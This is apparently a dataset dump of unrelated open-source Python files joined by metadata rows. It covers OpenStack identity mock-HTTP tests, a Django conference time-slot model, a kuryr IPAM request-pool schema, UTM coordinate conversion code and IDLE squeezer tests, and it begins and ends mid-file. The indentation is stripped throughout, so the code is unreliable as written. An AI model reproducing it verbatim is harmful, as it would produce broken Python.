'cloudServersOpenStack',
'cloudServersPreprod',
'glance',
'neutron',
'nova'])
service_names = catalog.get_service_names(service_type='compute')
self.assertEqual(service_names, ['cloudServers',
'cloudServersOpenStack',
'cloudServersPreprod',
'nova'])
class OpenStackIdentity_2_0_MockHttp(MockHttp):
fixtures = ComputeFileFixtures('openstack_identity/v2')
json_content_headers = {'content-type': 'application/json; charset=UTF-8'}
def _v2_0_tenants(self, method, url, body, headers):
if method == 'GET':
body = self.fixtures.load('v2_0_tenants.json')
return (httplib.OK, body, self.json_content_headers, httplib.responses[httplib.OK])
raise NotImplementedError()
class OpenStackIdentity_3_0_MockHttp(MockHttp):
fixtures = ComputeFileFixtures('openstack_identity/v3')
json_content_headers = {'content-type': 'application/json; charset=UTF-8'}
def _v3(self, method, url, body, headers):
if method == 'GET':
body = self.fixtures.load('v3_versions.json')
return (httplib.OK, body, self.json_content_headers, httplib.responses[httplib.OK])
raise NotImplementedError()
def _v3_domains(self, method, url, body, headers):
if method == 'GET':
body = self.fixtures.load('v3_domains.json')
return (httplib.OK, body, self.json_content_headers, httplib.responses[httplib.OK])
raise NotImplementedError()
def _v3_projects(self, method, url, body, headers):
if method == 'GET':
body = self.fixtures.load('v3_projects.json')
return (httplib.OK, body, self.json_content_headers, httplib.responses[httplib.OK])
raise NotImplementedError()
def _v3_auth_tokens(self, method, url, body, headers):
if method == 'POST':
status = httplib.OK
data = json.loads(body)
if 'password' in data['auth']['identity']:
if data['auth']['identity']['password']['user']['domain']['name'] != 'test_domain' or \
data['auth']['scope']['project']['domain']['name'] != 'test_domain':
status = httplib.UNAUTHORIZED
body = ComputeFileFixtures('openstack').load('_v3__auth.json')
headers = self.json_content_headers.copy()
headers['x-subject-token'] = '00000000000000000000000000000000'
return (status, body, headers, httplib.responses[httplib.OK])
raise NotImplementedError()
def _v3_users(self, method, url, body, headers):
if method == 'GET':
# list users
body = self.fixtures.load('v3_users.json')
return (httplib.OK, body, self.json_content_headers, httplib.responses[httplib.OK])
elif method == 'POST':
# create user
body = self.fixtures.load('v3_create_user.json')
return (httplib.CREATED, body, self.json_content_headers,
httplib.responses[httplib.CREATED])
raise NotImplementedError()
def _v3_users_a(self, method, url, body, headers):
if method == 'GET':
# look up a user
body = self.fixtures.load('v3_users_a.json')
return (httplib.OK, body, self.json_content_headers, httplib.responses[httplib.OK])
if method == 'PATCH':
# enable / disable user
body = self.fixtures.load('v3_users_a.json')
return (httplib.OK, body, self.json_content_headers, httplib.responses[httplib.OK])
raise NotImplementedError()
def _v3_users_b(self, method, url, body, headers):
if method == 'GET':
# look up a user
body = self.fixtures.load('v3_users_b.json')
return (httplib.OK, body, self.json_content_headers, httplib.responses[httplib.OK])
raise NotImplementedError()
def _v3_users_c(self, method, url, body, headers):
if method == 'GET':
# look up a user
body = self.fixtures.load('v3_users_c.json')
return (httplib.OK, body, self.json_content_headers, httplib.responses[httplib.OK])
raise NotImplementedError()
def _v3_roles(self, method, url, body, headers):
if method == 'GET':
body = self.fixtures.load('v3_roles.json')
return (httplib.OK, body, self.json_content_headers, httplib.responses[httplib.OK])
raise NotImplementedError()
def _v3_domains_default_users_a_roles_a(self, method, url, body, headers):
if method == 'PUT':
# grant domain role
body = ''
return (httplib.NO_CONTENT, body, self.json_content_headers,
httplib.responses[httplib.NO_CONTENT])
elif method == 'DELETE':
# revoke domain role
body = ''
return (httplib.NO_CONTENT, body, self.json_content_headers,
httplib.responses[httplib.NO_CONTENT])
raise NotImplementedError()
def _v3_projects_a_users_a_roles_a(self, method, url, body, headers):
if method == 'PUT':
# grant project role
body = ''
return (httplib.NO_CONTENT, body, self.json_content_headers,
httplib.responses[httplib.NO_CONTENT])
elif method == 'DELETE':
# revoke project role
body = ''
return (httplib.NO_CONTENT, body, self.json_content_headers,
httplib.responses[httplib.NO_CONTENT])
raise NotImplementedError()
def _v3_domains_default(self, method, url, body, headers):
if method == 'GET':
# get domain
body = self.fixtures.load('v3_domains_default.json')
return (httplib.OK, body, self.json_content_headers, httplib.responses[httplib.OK])
raise NotImplementedError()
def _v3_users_a_projects(self, method, url, body, headers):
if method == 'GET':
# get user projects
body = self.fixtures.load('v3_users_a_projects.json')
return (httplib.OK, body, self.json_content_headers, httplib.responses[httplib.OK])
raise NotImplementedError()
def _v3_domains_default_users_a_roles(self, method, url, body, headers):
if method == 'GET':
# get user domain roles
body = self.fixtures.load('v3_domains_default_users_a_roles.json')
return (httplib.OK, body, self.json_content_headers, httplib.responses[httplib.OK])
raise NotImplementedError()
def _v3_OS_FEDERATION_identity_providers_idp_protocols_oidc_auth(self, method, url, body, headers):
if method == 'GET':
headers = self.json_content_headers.copy()
headers['x-subject-token'] = '00000000000000000000000000000000'
return (httplib.OK, body, headers, httplib.responses[httplib.OK])
raise NotImplementedError()
def _v3_OS_FEDERATION_projects(self, method, url, body, headers):
if method == 'GET':
# get user projects
body = json.dumps({"projects": [{"id": "project_id"}]})
return (httplib.OK, body, self.json_content_headers, httplib.responses[httplib.OK])
raise NotImplementedError()
def _v3_auth_projects(self, method, url, body, headers):
if method == 'GET':
# get user projects
body = json.dumps({"projects": [{"id": "project_id"}]})
return (httplib.OK, body, self.json_content_headers, httplib.responses[httplib.OK])
raise NotImplementedError()
class OpenStackIdentity_3_0_federation_projects_MockHttp(OpenStackIdentity_3_0_MockHttp):
fixtures = ComputeFileFixtures('openstack_identity/v3')
json_content_headers = {'content-type': 'application/json; charset=UTF-8'}
def _v3_OS_FEDERATION_projects(self, method, url, body, headers):
if method == 'GET':
# get user projects
body = json.dumps({"projects": [{"id": "project_id"}]})
return (httplib.OK, body, self.json_content_headers, httplib.responses[httplib.OK])
raise NotImplementedError()
def _v3_auth_projects(self, method, url, body, headers):
return (httplib.INTERNAL_SERVER_ERROR, body, self.json_content_headers,
httplib.responses[httplib.INTERNAL_SERVER_ERROR])
class OpenStackIdentity_2_0_Connection_VOMSMockHttp(MockHttp):
fixtures = ComputeFileFixtures('openstack_identity/v2')
json_content_headers = {'content-type': 'application/json; charset=UTF-8'}
def _v2_0_tokens(self, method, url, body, headers):
if method == 'POST':
status = httplib.UNAUTHORIZED
data = json.loads(body)
if 'voms' in data['auth'] and data['auth']['voms'] is True:
status = httplib.OK
body = ComputeFileFixtures('openstack').load('_v2_0__auth.json')
headers = self.json_content_headers.copy()
headers['x-subject-token'] = '00000000000000000000000000000000'
return (status, body, headers, httplib.responses[httplib.OK])
raise NotImplementedError()
def _v2_0_tenants(self, method, url, body, headers):
if method == 'GET':
# get user projects
body = json.dumps({"tenant": [{"name": "tenant_name"}]})
return (httplib.OK, body, self.json_content_headers, httplib.responses[httplib.OK])
raise NotImplementedError()
if __name__ == '__main__':
sys.exit(unittest.main())
| apache-2.0 | -8,319,677,392,506,798,000 | 43.310059 | 117 | 0.558464 | false |
djangocon/2017.djangocon.eu | conference/schedule/models.py | 1 | 5351 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, unicode_literals
import datetime as dt
from autoslug import AutoSlugField
from autoslug.utils import slugify
from django.core.exceptions import ValidationError
from django.db import models
from django.template.defaultfilters import truncatechars_html
from django.utils.translation import gettext_lazy as _
from filer.fields.image import FilerImageField
from filer.models import ThumbnailOption
from meta.models import ModelMeta
from conference.cfp.models import Submission, WorkshopSubmission
class Slot(ModelMeta, models.Model):
"""
Model for conference time slots. It can be for a talk, a workshop, or a custom time slot (i. e. coffee break)
"""
talk = models.ForeignKey(
Submission, related_name='talks', limit_choices_to={'selected': True}, null=True, blank=True
)
slug = AutoSlugField(
_('Slug'), max_length=400, blank=True, populate_from='generated_slug', always_update=True
)
workshop = models.ForeignKey(
WorkshopSubmission, related_name='workshops', limit_choices_to={'selected': True}, null=True, blank=True
)
name = models.CharField(
_('Name'), max_length=250, null=True, blank=True,
help_text=_('Field for time slots that does not relate to a Talk or a Workshop.')
)
mugshot = FilerImageField(verbose_name=_('Speaker mughshot'), null=True, blank=True)
twitter = models.CharField(_('Twitter'), max_length=200, default='', blank=True)
schedule_abstract = models.TextField(_('Schedule abstract'), blank=True, null=True)
day = models.DateField(_('Date'))
start = models.TimeField(_('Start'))
duration = models.DurationField(_('Duration'))
sprint_days = models.BooleanField(_('Part of sprint days'), default=False)
show_end_time = models.BooleanField(_('Show end time in schedule'), default=False)
slides = models.URLField(_('Speaker slides'), blank=True, null=True)
video = models.URLField(_('Talk video'), blank=True, null=True)
_metadata = {
'title': 'title',
'description': 'get_meta_abstract',
'image': 'get_image',
}
class Meta:
verbose_name = _('Time slot')
verbose_name_plural = _('Time slots')
ordering = ('day', 'start')
def clean(self):
# ensure talk and workshop are NOT filled at the same time
if self.talk and self.workshop:
message = _('Please, select either a Talk or a Workshop, not both.')
raise ValidationError({
'talk': ValidationError(message=message, code='invalid'),
'workshop': ValidationError(message=message, code='invalid'),
})
def get_image(self):
if self.mugshot:
return self.mugshot.url
else:
return None
def get_meta_abstract(self):
return truncatechars_html(self.abstract, 180)
@property
def title(self):
if self.talk_id:
return self.talk.proposal_title
elif self.workshop_id:
return self.workshop.proposal_title
elif self.name:
return self.name
return ''
@property
def author(self):
if self.talk:
return self.talk.author
elif self.workshop:
return self.workshop.author
return ''
@property
def generated_slug(self):
return slugify(self.title)
@property
def twitter_split(self):
if self.twitter:
return self.twitter.split(',')
return ''
@property
def abstract(self):
if self.schedule_abstract:
return self.schedule_abstract
if self.talk:
return self.talk.proposal_abstract
elif self.workshop:
return self.workshop.proposal_abstract
return ''
@property
def bio(self):
if self.is_talk() and self.talk.author_bio and len(self.talk.author_bio) > 3:
return self.talk.author_bio
if self.is_workshop() and self.workshop.author_bio and len(self.workshop.author_bio) > 3:
return self.workshop.author_bio
return ''
@property
def parsed_duration(self):
minutes = self.duration.seconds//60
hours = minutes//60
if hours:
minutes -= hours * 60
if minutes:
return '{}h {}min'.format(hours, minutes)
return '{}h'.format(hours)
return '{}min'.format(minutes)
@property
def end_time(self):
combined = dt.datetime.combine(dt.date.today(), self.start)
end_time = combined + self.duration
return end_time.time()
@property
def height(self):
return self.duration.total_seconds() / 100 * 6
@property
def thumbnail_option(self):
return ThumbnailOption.objects.get(name__icontains='speaker').as_dict
def is_talk(self):
return True if self.talk else False
is_talk.short_description = _('Talk')
is_talk.boolean = True
def is_workshop(self):
return True if self.workshop else False
is_workshop.short_description = _('Workshop')
is_workshop.boolean = True
def is_custom(self):
return True if self.name else False
is_custom.short_description = _('Custom')
is_custom.boolean = True
| bsd-3-clause | -7,714,352,984,290,550,000 | 32.44375 | 113 | 0.63091 | false |
celebdor/kuryr-libnetwork | kuryr_libnetwork/schemata/request_pool.py | 1 | 2102 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from kuryr_libnetwork.schemata import commons
REQUEST_POOL_SCHEMA = {
u'links': [{
u'method': u'POST',
u'href': u'/IpamDriver.RequestPool',
u'description': u'Allocate pool of ip addresses',
u'rel': u'self',
u'title': u'Create'
}],
u'title': u'Create pool',
u'required': [u'AddressSpace', u'Pool', u'SubPool', u'V6'],
u'definitions': {u'commons': {}},
u'$schema': u'http://json-schema.org/draft-04/hyper-schema',
u'type': u'object',
u'properties': {
u'AddressSpace': {
u'description': u'The name of the address space.',
u'type': u'string',
u'example': u'foo',
},
u'Pool': {
u'description': u'A range of IP Addresses represented in '
u'CIDR format address/mask.',
u'$ref': u'#/definitions/commons/definitions/cidr'
},
u'SubPool': {
u'description': u'A subset of IP range from Pool in'
u'CIDR format address/mask.',
u'$ref': u'#/definitions/commons/definitions/cidr'
},
u'Options': {
u'type': [u'object', u'null'],
u'description': u'Options',
u'example': {},
},
u'V6': {
u'description': u'If set to "True", requesting IPv6 pool and '
u'vice-versa.',
u'type': u'boolean',
u'example': False
}
}
}
REQUEST_POOL_SCHEMA[u'definitions'][u'commons'] = commons.COMMONS
| apache-2.0 | -7,775,517,763,167,128,000 | 35.241379 | 75 | 0.569933 | false |
alexanderfefelov/nav | python/nav/web/geomap/coordinates.py | 1 | 10124 | #
# Copyright (C) 2009, 2010 UNINETT AS
#
# This file is part of Network Administration Visualized (NAV).
#
# NAV is free software: you can redistribute it and/or modify it under the
# terms of the GNU General Public License version 2 as published by the Free
# Software Foundation.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details. You should have received a copy of the GNU General Public
# License along with NAV. If not, see <http://www.gnu.org/licenses/>.
#
"""Coordinate transformation.
Functions for converting between UTM and longitude/latitude, and for
parsing a string representation of UTM.
Derived from code available under GPL from http://pygps.org/
(http://pygps.org/LatLongUTMconversion-1.2.tar.gz)
"""
from math import pi, sin, cos, tan, sqrt
import re
_deg2rad = pi / 180.0
_rad2deg = 180.0 / pi
_equatorial_radius = 2
_eccentricity_squared = 3
_ellipsoid = [
# id, Ellipsoid name, Equatorial Radius, square of eccentricity
# first once is a placeholder only, To allow array indices to match id numbers
[ -1, "Placeholder", 0, 0],
[ 1, "Airy", 6377563, 0.00667054],
[ 2, "Australian National", 6378160, 0.006694542],
[ 3, "Bessel 1841", 6377397, 0.006674372],
[ 4, "Bessel 1841 (Nambia] ", 6377484, 0.006674372],
[ 5, "Clarke 1866", 6378206, 0.006768658],
[ 6, "Clarke 1880", 6378249, 0.006803511],
[ 7, "Everest", 6377276, 0.006637847],
[ 8, "Fischer 1960 (Mercury] ", 6378166, 0.006693422],
[ 9, "Fischer 1968", 6378150, 0.006693422],
[ 10, "GRS 1967", 6378160, 0.006694605],
[ 11, "GRS 1980", 6378137, 0.00669438],
[ 12, "Helmert 1906", 6378200, 0.006693422],
[ 13, "Hough", 6378270, 0.00672267],
[ 14, "International", 6378388, 0.00672267],
[ 15, "Krassovsky", 6378245, 0.006693422],
[ 16, "Modified Airy", 6377340, 0.00667054],
[ 17, "Modified Everest", 6377304, 0.006637847],
[ 18, "Modified Fischer 1960", 6378155, 0.006693422],
[ 19, "South American 1969", 6378160, 0.006694542],
[ 20, "WGS 60", 6378165, 0.006693422],
[ 21, "WGS 66", 6378145, 0.006694542],
[ 22, "WGS-72", 6378135, 0.006694318],
[ 23, "WGS-84", 6378137, 0.00669438]
]
#Reference ellipsoids derived from Peter H. Dana's website-
#http://www.utexas.edu/depts/grg/gcraft/notes/datum/elist.html
#Department of Geography, University of Texas at Austin
#Internet: pdana@mail.utexas.edu
#3/22/95
#Source
#Defense Mapping Agency. 1987b. DMA Technical Report: Supplement to Department of Defense World Geodetic System
#1984 Technical Report. Part I and II. Washington, DC: Defense Mapping Agency
def ll_to_utm(reference_ellipsoid, lat, lon, zone = None):
"""converts lat/long to UTM coords. Equations from USGS Bulletin 1532
East Longitudes are positive, West longitudes are negative.
North latitudes are positive, South latitudes are negative
lat and Long are in decimal degrees
Written by Chuck Gantz- chuck.gantz@globalstar.com"""
a = _ellipsoid[reference_ellipsoid][_equatorial_radius]
ecc_squared = _ellipsoid[reference_ellipsoid][_eccentricity_squared]
k0 = 0.9996
#Make sure the longitude is between -180.00 .. 179.9
lon_tmp = (lon+180)-int((lon+180)/360)*360-180 # -180.00 .. 179.9
lat_rad = lat*_deg2rad
lon_rad = lon_tmp*_deg2rad
if zone is None:
zone_number = int((lon_tmp + 180)/6) + 1
else:
zone_number = zone
if lat >= 56.0 and lat < 64.0 and lon_tmp >= 3.0 and lon_tmp < 12.0:
zone_number = 32
# Special zones for Svalbard
if lat >= 72.0 and lat < 84.0:
if lon_tmp >= 0.0 and lon_tmp < 9.0:
zone_number = 31
elif lon_tmp >= 9.0 and lon_tmp < 21.0:
zone_number = 33
elif lon_tmp >= 21.0 and lon_tmp < 33.0:
zone_number = 35
elif lon_tmp >= 33.0 and lon_tmp < 42.0:
zone_number = 37
lon_origin = (zone_number - 1)*6 - 180 + 3 #+3 puts origin in middle of zone
lon_origin_rad = lon_origin * _deg2rad
#compute the UTM Zone from the latitude and longitude
utm_zone = "%d%c" % (zone_number, _utm_letter_designator(lat))
ecc_prime_squared = (ecc_squared)/(1-ecc_squared)
N = a/sqrt(1-ecc_squared*sin(lat_rad)*sin(lat_rad))
T = tan(lat_rad)*tan(lat_rad)
C = ecc_prime_squared*cos(lat_rad)*cos(lat_rad)
A = cos(lat_rad)*(lon_rad-lon_origin_rad)
M = a*((1
- ecc_squared/4
- 3*ecc_squared*ecc_squared/64
- 5*ecc_squared*ecc_squared*ecc_squared/256)*lat_rad
- (3*ecc_squared/8
+ 3*ecc_squared*ecc_squared/32
+ 45*ecc_squared*ecc_squared*ecc_squared/1024)*sin(2*lat_rad)
+ (15*ecc_squared*ecc_squared/256 + 45*ecc_squared*ecc_squared*ecc_squared/1024)*sin(4*lat_rad)
- (35*ecc_squared*ecc_squared*ecc_squared/3072)*sin(6*lat_rad))
utm_easting = (k0*N*(A+(1-T+C)*A*A*A/6
+ (5-18*T+T*T+72*C-58*ecc_prime_squared)*A*A*A*A*A/120)
+ 500000.0)
utm_northing = (k0*(M+N*tan(lat_rad)*(A*A/2+(5-T+9*C+4*C*C)*A*A*A*A/24
+ (61
-58*T
+T*T
+600*C
-330*ecc_prime_squared)*A*A*A*A*A*A/720)))
if lat < 0:
utm_northing = utm_northing + 10000000.0; #10000000 meter offset for southern hemisphere
return (utm_zone, utm_easting, utm_northing)
def _utm_letter_designator(lat):
"""This routine determines the correct UTM letter designator for the given latitude
returns 'Z' if latitude is outside the UTM limits of 84N to 80S
Written by Chuck Gantz- chuck.gantz@globalstar.com"""
if 84 >= lat >= 72: return 'X'
elif 72 > lat >= 64: return 'W'
elif 64 > lat >= 56: return 'V'
elif 56 > lat >= 48: return 'U'
elif 48 > lat >= 40: return 'T'
elif 40 > lat >= 32: return 'S'
elif 32 > lat >= 24: return 'R'
elif 24 > lat >= 16: return 'Q'
elif 16 > lat >= 8: return 'P'
elif 8 > lat >= 0: return 'N'
elif 0 > lat >= -8: return 'M'
elif -8 > lat >= -16: return 'L'
elif -16 > lat >= -24: return 'K'
elif -24 > lat >= -32: return 'J'
elif -32 > lat >= -40: return 'H'
elif -40 > lat >= -48: return 'G'
elif -48 > lat >= -56: return 'F'
elif -56 > lat >= -64: return 'E'
elif -64 > lat >= -72: return 'D'
elif -72 > lat >= -80: return 'C'
else: return 'Z' # if the Latitude is outside the UTM limits
def utm_to_ll(reference_ellipsoid, northing, easting, zone):
"""converts UTM coords to lat/long. Equations from USGS Bulletin 1532
East Longitudes are positive, West longitudes are negative.
North latitudes are positive, South latitudes are negative
lat and lon are in decimal degrees.
Written by Chuck Gantz- chuck.gantz@globalstar.com
Converted to Python by Russ Nelson <nelson@crynwr.com>"""
k0 = 0.9996
a = _ellipsoid[reference_ellipsoid][_equatorial_radius]
ecc_squared = _ellipsoid[reference_ellipsoid][_eccentricity_squared]
e1 = (1-sqrt(1-ecc_squared))/(1+sqrt(1-ecc_squared))
#northern_hemisphere; //1 for northern hemispher, 0 for southern
x = easting - 500000.0 #remove 500,000 meter offset for longitude
y = northing
zone_letter = zone[-1]
zone_number = int(zone[:-1])
if zone_letter >= 'N':
northern_hemisphere = 1 # point is in northern hemisphere
else:
northern_hemisphere = 0 # point is in southern hemisphere
y -= 10000000.0 # remove 10,000,000 meter offset used for southern hemisphere
lon_origin = (zone_number - 1)*6 - 180 + 3 # +3 puts origin in middle of zone
ecc_prime_squared = (ecc_squared)/(1-ecc_squared)
M = y / k0
mu = M/(a*(1-ecc_squared/4-3*ecc_squared*ecc_squared/64-5*ecc_squared*ecc_squared*ecc_squared/256))
phi1_rad = (mu + (3*e1/2-27*e1*e1*e1/32)*sin(2*mu)
+ (21*e1*e1/16-55*e1*e1*e1*e1/32)*sin(4*mu)
+(151*e1*e1*e1/96)*sin(6*mu))
phi1 = phi1_rad*_rad2deg;
N1 = a/sqrt(1-ecc_squared*sin(phi1_rad)*sin(phi1_rad))
T1 = tan(phi1_rad)*tan(phi1_rad)
C1 = ecc_prime_squared*cos(phi1_rad)*cos(phi1_rad)
R1 = a*(1-ecc_squared)/pow(1-ecc_squared*sin(phi1_rad)*sin(phi1_rad), 1.5)
D = x/(N1*k0)
lat = phi1_rad - (N1*tan(phi1_rad)/R1)*(D*D/2-(5+3*T1+10*C1-4*C1*C1-9*ecc_prime_squared)*D*D*D*D/24
+(61+90*T1+298*C1+45*T1*T1-252*ecc_prime_squared-3*C1*C1)*D*D*D*D*D*D/720)
lat = lat * _rad2deg
lon = (D-(1+2*T1+C1)*D*D*D/6+(5-2*C1+28*T1-3*C1*C1+8*ecc_prime_squared+24*T1*T1)
*D*D*D*D*D/120)/cos(phi1_rad)
lon = lon_origin + lon * _rad2deg
return (lat, lon)
def parse_utm(utm_str):
"""Parse UTM coordinates from a string.
utm_str should be a string of the form 'zh n e', where z is a zone
number, h a hemisphere identifier ('N' or 'S') and n and e the
northing and easting. h may be omitted, in which case 'N' is
assumed.
Return value: dictionary with keys (zone, hemisphere, n, e).
"""
default_hemisphere = 'N'
utm_re = (r'^\W*([0-9][0-9])([NS]?)\W+([0-9]*[.]?[0-9]+)\W+'
r'([0-9]*[.]?[0-9]+)\W*$')
m = re.match(utm_re, utm_str)
if m is None:
raise Exception('incorrectly formatted UTM string "' + utm_str)
utm = {}
utm['zone'] = int(m.group(1))
utm['hemisphere'] = m.group(2)
if utm['hemisphere'] == '':
utm['hemisphere'] = default_hemisphere
utm['n'] = float(m.group(3))
utm['e'] = float(m.group(4))
return utm
def utm_str_to_lonlat(utm_str):
"""Convert UTM coordinates in string form (see parse_utm) to a
(longitude,latitude) pair.
"""
utm = parse_utm(utm_str)
(lat, lon) = utm_to_ll(23, utm['n'], utm['e'],
'%d%s'%(utm['zone'], utm['hemisphere']))
return (lon, lat)
| gpl-2.0 | 7,722,432,487,132,970,000 | 36.776119 | 116 | 0.610233 | false |
FFMG/myoddweb.piger | monitor/api/python/Python-3.7.2/Lib/idlelib/idle_test/test_squeezer.py | 1 | 21861 | from collections import namedtuple
from tkinter import Text, Tk
import unittest
from unittest.mock import Mock, NonCallableMagicMock, patch, sentinel, ANY
from test.support import requires
from idlelib.config import idleConf
from idlelib.squeezer import count_lines_with_wrapping, ExpandingButton, \
Squeezer
from idlelib import macosx
from idlelib.textview import view_text
from idlelib.tooltip import Hovertip
from idlelib.pyshell import PyShell
SENTINEL_VALUE = sentinel.SENTINEL_VALUE
def get_test_tk_root(test_instance):
"""Helper for tests: Create a root Tk object."""
requires('gui')
root = Tk()
root.withdraw()
def cleanup_root():
root.update_idletasks()
root.destroy()
test_instance.addCleanup(cleanup_root)
return root
class CountLinesTest(unittest.TestCase):
"""Tests for the count_lines_with_wrapping function."""
def check(self, expected, text, linewidth, tabwidth):
return self.assertEqual(
expected,
count_lines_with_wrapping(text, linewidth, tabwidth),
)
def test_count_empty(self):
"""Test with an empty string."""
self.assertEqual(count_lines_with_wrapping(""), 0)
def test_count_begins_with_empty_line(self):
"""Test with a string which begins with a newline."""
self.assertEqual(count_lines_with_wrapping("\ntext"), 2)
def test_count_ends_with_empty_line(self):
"""Test with a string which ends with a newline."""
self.assertEqual(count_lines_with_wrapping("text\n"), 1)
def test_count_several_lines(self):
"""Test with several lines of text."""
self.assertEqual(count_lines_with_wrapping("1\n2\n3\n"), 3)
def test_tab_width(self):
"""Test with various tab widths and line widths."""
self.check(expected=1, text='\t' * 1, linewidth=8, tabwidth=4)
self.check(expected=1, text='\t' * 2, linewidth=8, tabwidth=4)
self.check(expected=2, text='\t' * 3, linewidth=8, tabwidth=4)
self.check(expected=2, text='\t' * 4, linewidth=8, tabwidth=4)
self.check(expected=3, text='\t' * 5, linewidth=8, tabwidth=4)
# test longer lines and various tab widths
self.check(expected=4, text='\t' * 10, linewidth=12, tabwidth=4)
self.check(expected=10, text='\t' * 10, linewidth=12, tabwidth=8)
self.check(expected=2, text='\t' * 4, linewidth=10, tabwidth=3)
# test tabwidth=1
self.check(expected=2, text='\t' * 9, linewidth=5, tabwidth=1)
self.check(expected=2, text='\t' * 10, linewidth=5, tabwidth=1)
self.check(expected=3, text='\t' * 11, linewidth=5, tabwidth=1)
# test for off-by-one errors
self.check(expected=2, text='\t' * 6, linewidth=12, tabwidth=4)
self.check(expected=3, text='\t' * 6, linewidth=11, tabwidth=4)
self.check(expected=2, text='\t' * 6, linewidth=13, tabwidth=4)
class SqueezerTest(unittest.TestCase):
"""Tests for the Squeezer class."""
def make_mock_editor_window(self):
"""Create a mock EditorWindow instance."""
editwin = NonCallableMagicMock()
# isinstance(editwin, PyShell) must be true for Squeezer to enable
# auto-squeezing; in practice this will always be true
editwin.__class__ = PyShell
return editwin
def make_squeezer_instance(self, editor_window=None):
"""Create an actual Squeezer instance with a mock EditorWindow."""
if editor_window is None:
editor_window = self.make_mock_editor_window()
return Squeezer(editor_window)
def test_count_lines(self):
"""Test Squeezer.count_lines() with various inputs.
This checks that Squeezer.count_lines() calls the
count_lines_with_wrapping() function with the appropriate parameters.
"""
for tabwidth, linewidth in [(4, 80), (1, 79), (8, 80), (3, 120)]:
self._test_count_lines_helper(linewidth=linewidth,
tabwidth=tabwidth)
def _prepare_mock_editwin_for_count_lines(self, editwin,
linewidth, tabwidth):
"""Prepare a mock EditorWindow object for Squeezer.count_lines."""
CHAR_WIDTH = 10
BORDER_WIDTH = 2
PADDING_WIDTH = 1
# Prepare all the required functionality on the mock EditorWindow object
# so that the calculations in Squeezer.count_lines() can run.
editwin.get_tk_tabwidth.return_value = tabwidth
editwin.text.winfo_width.return_value = \
linewidth * CHAR_WIDTH + 2 * (BORDER_WIDTH + PADDING_WIDTH)
text_opts = {
'border': BORDER_WIDTH,
'padx': PADDING_WIDTH,
'font': None,
}
editwin.text.cget = lambda opt: text_opts[opt]
# monkey-path tkinter.font.Font with a mock object, so that
# Font.measure('0') returns CHAR_WIDTH
mock_font = Mock()
def measure(char):
if char == '0':
return CHAR_WIDTH
raise ValueError("measure should only be called on '0'!")
mock_font.return_value.measure = measure
patcher = patch('idlelib.squeezer.Font', mock_font)
patcher.start()
self.addCleanup(patcher.stop)
def _test_count_lines_helper(self, linewidth, tabwidth):
"""Helper for test_count_lines."""
editwin = self.make_mock_editor_window()
self._prepare_mock_editwin_for_count_lines(editwin, linewidth, tabwidth)
squeezer = self.make_squeezer_instance(editwin)
mock_count_lines = Mock(return_value=SENTINEL_VALUE)
text = 'TEXT'
with patch('idlelib.squeezer.count_lines_with_wrapping',
mock_count_lines):
self.assertIs(squeezer.count_lines(text), SENTINEL_VALUE)
mock_count_lines.assert_called_with(text, linewidth, tabwidth)
def test_init(self):
"""Test the creation of Squeezer instances."""
editwin = self.make_mock_editor_window()
squeezer = self.make_squeezer_instance(editwin)
self.assertIs(squeezer.editwin, editwin)
self.assertEqual(squeezer.expandingbuttons, [])
def test_write_no_tags(self):
"""Test Squeezer's overriding of the EditorWindow's write() method."""
editwin = self.make_mock_editor_window()
for text in ['', 'TEXT', 'LONG TEXT' * 1000, 'MANY_LINES\n' * 100]:
editwin.write = orig_write = Mock(return_value=SENTINEL_VALUE)
squeezer = self.make_squeezer_instance(editwin)
self.assertEqual(squeezer.editwin.write(text, ()), SENTINEL_VALUE)
self.assertEqual(orig_write.call_count, 1)
orig_write.assert_called_with(text, ())
self.assertEqual(len(squeezer.expandingbuttons), 0)
def test_write_not_stdout(self):
"""Test Squeezer's overriding of the EditorWindow's write() method."""
for text in ['', 'TEXT', 'LONG TEXT' * 1000, 'MANY_LINES\n' * 100]:
editwin = self.make_mock_editor_window()
editwin.write.return_value = SENTINEL_VALUE
orig_write = editwin.write
squeezer = self.make_squeezer_instance(editwin)
self.assertEqual(squeezer.editwin.write(text, "stderr"),
SENTINEL_VALUE)
self.assertEqual(orig_write.call_count, 1)
orig_write.assert_called_with(text, "stderr")
self.assertEqual(len(squeezer.expandingbuttons), 0)
def test_write_stdout(self):
"""Test Squeezer's overriding of the EditorWindow's write() method."""
editwin = self.make_mock_editor_window()
self._prepare_mock_editwin_for_count_lines(editwin,
linewidth=80, tabwidth=8)
for text in ['', 'TEXT']:
editwin.write = orig_write = Mock(return_value=SENTINEL_VALUE)
squeezer = self.make_squeezer_instance(editwin)
squeezer.auto_squeeze_min_lines = 50
self.assertEqual(squeezer.editwin.write(text, "stdout"),
SENTINEL_VALUE)
self.assertEqual(orig_write.call_count, 1)
orig_write.assert_called_with(text, "stdout")
self.assertEqual(len(squeezer.expandingbuttons), 0)
for text in ['LONG TEXT' * 1000, 'MANY_LINES\n' * 100]:
editwin.write = orig_write = Mock(return_value=SENTINEL_VALUE)
squeezer = self.make_squeezer_instance(editwin)
squeezer.auto_squeeze_min_lines = 50
self.assertEqual(squeezer.editwin.write(text, "stdout"), None)
self.assertEqual(orig_write.call_count, 0)
self.assertEqual(len(squeezer.expandingbuttons), 1)
def test_auto_squeeze(self):
"""Test that the auto-squeezing creates an ExpandingButton properly."""
root = get_test_tk_root(self)
text_widget = Text(root)
text_widget.mark_set("iomark", "1.0")
editwin = self.make_mock_editor_window()
editwin.text = text_widget
squeezer = self.make_squeezer_instance(editwin)
squeezer.auto_squeeze_min_lines = 5
squeezer.count_lines = Mock(return_value=6)
editwin.write('TEXT\n'*6, "stdout")
self.assertEqual(text_widget.get('1.0', 'end'), '\n')
self.assertEqual(len(squeezer.expandingbuttons), 1)
def test_squeeze_current_text_event(self):
"""Test the squeeze_current_text event."""
root = get_test_tk_root(self)
# squeezing text should work for both stdout and stderr
for tag_name in ["stdout", "stderr"]:
text_widget = Text(root)
